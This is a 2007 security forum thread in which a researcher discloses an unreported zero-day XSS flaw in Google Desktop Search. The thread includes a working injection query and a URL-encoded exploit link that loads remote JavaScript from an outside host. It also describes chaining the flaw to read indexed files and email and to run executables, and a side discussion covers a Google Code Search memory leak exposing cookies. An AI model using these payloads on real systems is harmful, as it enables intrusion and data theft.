Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Google Desktop Search XSS Vulnerability
Posted by: Hong
Date: January 30, 2007 04:42AM

Affected: Google Desktop 4.5 - 5.0.701.18382

Description:
Google Desktop Search does not sanitize " in the To: field.

PoC:
Search the following query by Google Desktop Search:
to:"x"x style=height:500;width:500 onmouseover=alert('xss') "b
Then go to the advanced search and move your mouse over the "TO:" textfield.

This PoC only shows the concept, it requires user interacion, but if you find any XSS hole on google.com, you can searching it by google web search, then uses google.com XSS hole to get the desktop link and then append &flags=128 to the end of the URI. After fully exploit it, attacker can read any file, email and anything indexed by Google Desktop Search, or using other Google Desktop functions, e.g. using redir function to execute any indexed executable file.

Another PoC, it uses a google group XSS Vuln to exploit it.(IE Only)
http://groups.google.com/groups?q=to%3A%22x%22x+style%3Dxa%3Aexpression%28s%3Ddocument.createElement%28%27script%27%29%29%3Bxb%3Aexpression%28s.src%3D%27http%3A%2F%2Fyathong.googlepages.com%2FGDSxss2.js%27%29%3Bxc%3Aexpression%28document.appendChild%28s%29%29+%22&ie=%20style%3Dxa%3Aexpression%28s%3Ddocument.createElement%28%27script%27%29%29%3Bxb%3Aexpression%28s.src%3D%27http%3A%2F%2Fyathong.googlepages.com%2FGDSxss1.js%27%29%3Bxc%3Aexpression%28document.appendChild%28s%29%29%20&hl=zh_TW%cd&oe=gb2312


It is a zero-day exploit. I did not inform Google. Originally, I plan on writing advisory in chinese and inform Google China security team. Unfortunately, it seems that Google China does not has any security team or security engineer, and will not hire any, really disappointed.

P.S. Sorry for my poor english, if you has any question, feel free to ask.

Edit: Add the PoC Link.

- Hong



Edited 1 time(s). Last edit at 02/01/2007 04:57AM by Hong.

Options: ReplyQuote
Re: Google Desktop Search XSS Vulnerability
Posted by: jungsonn
Date: January 30, 2007 05:38AM

Well if they would, they certainly must hire you Hong! :) great find, and dangerous to.

Options: ReplyQuote
Re: Google Desktop Search XSS Vulnerability
Posted by: trev
Date: January 30, 2007 08:42AM

Sorry, I didn't quite get how it can be exploited. I didn't see Google's Desktop Search in action, is it somehow possible to inject search queries into it from the web?

Options: ReplyQuote
Re: Google Desktop Search XSS Vulnerability
Posted by: Hong
Date: January 30, 2007 01:10PM

@jungsonn
If I can become security engineer, I will very happy, but it is quite impossible, I have not any work experience in security field, and in my city, even whole China does not pay close attention to security problems. There are very little security jobs.

@trev
Yes, it can inject search queries into it from the web.
After user installs Google Desktop Search, a new hyperlink appears in google.com above the query textfield called Desktop. User searches by google.com, the Desktop hyperlink links to the URI of the user's Google Desktop server including the query string and the private key, but it only shows the basic searching interface, after adding &flags=128 to that URI, it shows the advance searching interface.

- Hong

Options: ReplyQuote
Re: Google Desktop Search XSS Vulnerability
Posted by: rsnake
Date: February 03, 2007 07:17PM

I un-installed Google Desktop a few years ago and installed Yahoo desktop which not only indexes a lot more types of data, and has automated readers built in, but also doesn't have a network shim making it quite a bit more secure.

Hong, great job, but could you provide some screenshots / HTML snippets? I'd like to talk about this, but I'm not sure I understand how the desktop is involved in that search query.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Google Desktop Search XSS Vulnerability
Posted by: Kyran
Date: February 03, 2007 07:56PM

How is Yahoo Desktop working out for your indexing needs? Lately I use Windows Desktop Search. It has lots of 'IFilters' to read inside of several formats like PDF and indexes many 'text' formats and the contents.

- Kyran

Options: ReplyQuote
Re: Google Desktop Search XSS Vulnerability
Posted by: rsnake
Date: February 04, 2007 09:00PM

I haven't played with Windows Desktop Search. Maybe I'll install it on a test machine and try it. I used Yahoo Desktop Search religiously for two years - I didn't notice much speed degradation at all and it indexes hundreds of file types.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Google Desktop Search XSS Vulnerability
Posted by: Kyran
Date: February 05, 2007 12:30AM

I'll install Yahoo Desktop Search on a test box soon too. Currently my WDS has 4000ish items indexed, all from specified folders(I want to keep my results clean. No need to have a random ini file turn up when I search for 'config') and it brings my results nearly instantly on this old box.

- Kyran

Options: ReplyQuote
Re: Google Desktop Search XSS Vulnerability
Posted by: Hong
Date: February 05, 2007 04:02AM

@RSnake
Google Desktop Search provides "to:" operator to search for field "to" of Email.
If the search query is:
to:"x"x XSS HERE "
The resulting HTML of the "to:" textfield will become:
<input type=text size=24 name=to value="x"x XSS HERE ">
Here is the screenshot of the result(sorry that it is a chinese version)
http://yathong.googlepages.com/GDS1.jpg

And here is another example.
to:"x"x style=height:500;width:500 onmouseover=alert('xss') "
The resulting HTML of the "to:" textfield will become:
<input type=text size=24 name=to value="x"x style=height:500;width:500 onmouseover=alert(&#39;xss&#39;) ">
http://yathong.googlepages.com/GDS2.jpg

Google Desktop Search does not go to the advanced search by default unless appends &flags=128 to the URI.
Google Desktop Search releases a new version now, I don't know whether it fixes or not.

- Hong

Options: ReplyQuote
Re: Google Desktop Search XSS Vulnerability
Posted by: jungsonn
Date: February 05, 2007 08:01AM

Cool that it also is echoed back into the document title, from there one could easily add a new layer on top of the body, faking or phising users.

Options: ReplyQuote
Re: Google Desktop Search XSS Vulnerability
Posted by: rsnake
Date: February 05, 2007 01:44PM

And can you force users to search for that string or is this something they'd have to type in by hand? For some reason I thought they used a nonce to avoid allowing users to automatically post to their interface.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Google Desktop Search XSS Vulnerability
Posted by: Hong
Date: February 12, 2007 02:37AM

It can force users to search for that string. When uesr searching from google.com, it creates a link to google desktop with that searching query and nonce, and attacker can get that link through google.com XSS hole, then redirect to it.
http://yathong.googlepages.com/GDS3.jpg

- Hong



Edited 1 time(s). Last edit at 02/12/2007 05:01AM by Hong.

Options: ReplyQuote
Re: Google Desktop Search XSS Vulnerability
Posted by: trev
Date: February 21, 2007 10:21AM

http://www.watchfire.com/resources/Overtaking-Google-Desktop.pdf is about a very similar XSS vulnerability in Google Desktop that has been fixed now. Explanation of the risks goes along the same lines as this thread - but this thread isn't referenced. Is it related? And most interestingly - is this XSS vulnerability also fixed?

Options: ReplyQuote
Re: Google Desktop Search XSS Vulnerability
Posted by: rsnake
Date: February 21, 2007 12:12PM

I was wondering the same thing but it doesn't look like it. Btw, anyone have any idea what is going on here:

http://www.google.com/codesearch?hl=en&lr=&q=%22++-%27%27+show%3At-8icmuByTQ%3A37ubc1p6nyQ%3ANGJa6sl73i8&btnG=Search

Sorry, yah, these URLs are weird... just enter some random crap in the q variable but start it with a quote. It's just bizzare the results you get back.



Edited 1 time(s). Last edit at 02/21/2007 06:35PM by rsnake.

Options: ReplyQuote
Re: Google Desktop Search XSS Vulnerability
Posted by: blad3
Date: February 21, 2007 04:57PM

Damn, this forum is killing the URLs.
RSnake, you need to save them:)

Options: ReplyQuote
Re: Google Desktop Search XSS Vulnerability
Posted by: rsnake
Date: February 21, 2007 06:36PM

I may be able to save them from their ignorance, but no one can save them from their arrogance.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Google Desktop Search XSS Vulnerability
Posted by: trev
Date: February 22, 2007 05:51AM

Rsnake, I see random text in the error messages (changes even for the same query), I think the server is reading past the string end looking for the closing quotation mark - that's simply some trash from the server's memory. Nice one! Did you report it?

Edit: Tested it and it seems Google does in fact use null-terminated strings. I thought they used Python?

Edit2: It finally turned up something interesting - an IP address (196.207.x.x). It even answers to pings. Code search doesn't find it so it must be the address of some user. (On a closer look: the IP addresses I get there are more likely to be storage servers).

Edit3: And now even more interesting - value of the PREF cookie. Only 40 minutes old according to its timestamp.



Edited 4 time(s). Last edit at 02/22/2007 06:59AM by trev.

Options: ReplyQuote
Re: Google Desktop Search XSS Vulnerability
Posted by: Hong
Date: February 22, 2007 02:05PM

@trev
They are not related, the XSS hole watchfire disclosures using operator under:, that is a persistent XSS. And Google Desktop 4.5 - 5.0.701.18382 does not affect.
I don't know this XSS vulnerability fixed or not, I haven't updated it. I will update it later and report it back.

- Hong

Options: ReplyQuote
Re: Google Desktop Search XSS Vulnerability
Posted by: rsnake
Date: February 22, 2007 11:18PM

Hong, Trev was talking about that weird codesearch bug that I wrote about.

Trev, no I didn't report it. They can figure it out for themselves, they read this site anyway.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Google Desktop Search XSS Vulnerability
Posted by: Hong
Date: March 01, 2007 05:25AM

RSnake, I replied to trev previous post, sorry that I didn't quote his message.

trev Wrote:
-------------------------------------------------------
> http://www.watchfire.com/resources/Overtaking-Goog
> le-Desktop.pdf is about a very similar XSS
> vulnerability in Google Desktop that has been
> fixed now. Explanation of the risks goes along the
> same lines as this thread - but this thread isn't
> referenced. Is it related? And most interestingly
> - is this XSS vulnerability also fixed?

Google Desktop 4.5 5.0.0702.07034 fixed the vulnerability, but I found out another XSS Vuln.
http://yathong.googlepages.com/gds4.jpg
I still don't know where is the problem to cause this XSS Vuln, I will research on it and post the result.

- Hong

Options: ReplyQuote
Re: Google Desktop Search XSS Vulnerability
Posted by: rsnake
Date: March 01, 2007 10:38PM

Yes, please do. That's definitely worth a post.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote


Sorry, only registered users may post in this forum.